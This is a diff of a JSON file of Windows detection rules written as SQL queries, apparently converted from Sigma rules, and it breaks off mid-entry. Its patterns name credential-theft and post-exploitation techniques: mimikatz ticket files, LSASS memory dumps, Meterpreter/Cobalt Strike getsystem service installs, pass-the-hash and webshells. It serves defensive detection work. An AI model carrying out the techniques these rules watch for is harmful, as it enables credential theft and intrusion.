"status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Anydesk Temporary Artefact", - "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_anydesk_artefact.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "Very unlikely" + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Installation of TeamViewer Desktop", - "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", - "status": "test", - "description": "TeamViewer_Desktop.exe is create during install", + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + "description": "Detects an installation of a device that is forbidden by the system policy", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_install_teamviewer_desktop.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADCS Certificate Template Configuration Vulnerability", + "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "status": "test", + "description": "Detects certificate creation with template allowing risk permission subject", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unlikely" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" }, { - "title": "Suspicious PROCEXP152.sys File Created In TMP", - "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "status": "test", - "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "External Disk Drive Or USB Storage Device", + "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "status": "test", + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "author": "Keith Wright", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_external_device.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", - "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", + "status": "experimental", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "System administrators managing certififcates." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Unknown" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Addition of legitimate plugins" + "Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "User Logoff Event", + "id": "0badd08f-c6a3-4630-90d3-6875cca440be", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_user_logoff.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Monitoring tools", + "Legitimate system administration" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_susp_wmi_login.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], 